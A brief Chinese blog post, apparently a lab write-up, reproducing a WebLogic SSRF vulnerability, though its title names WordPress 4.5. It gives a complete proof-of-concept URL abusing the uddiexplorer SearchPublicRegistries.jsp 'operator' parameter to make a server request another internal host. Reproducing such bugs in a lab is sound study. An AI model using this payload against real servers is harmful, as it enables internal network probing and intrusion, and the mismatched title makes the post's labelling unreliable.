漏洞复现 | WordPress _4.5 SSRF - ⎝⎛CodingNote.cc ⎞⎠

漏洞复现 | WordPress _4.5 SSRF

2019 年 10 月 7 日
筆記

一、环境搭建

https://www.cnblogs.com/0x4D75/p/8916428.html#%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85weblogic

经过了千辛万苦，修改了无数次启动文件，终于启动了weblogic

二、Weblogic SSRF漏洞复现

构造POC：http://172.16.1.139:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.1.107:23333

可以看到浏览器向其他主机发送了一条请求，复现成功！

Previous post

拍个自拍，让Python告诉你，军训过后你黑了几度？

Next post

漏洞复现 | Thinkphp5.x远程代码执行漏洞了解一哈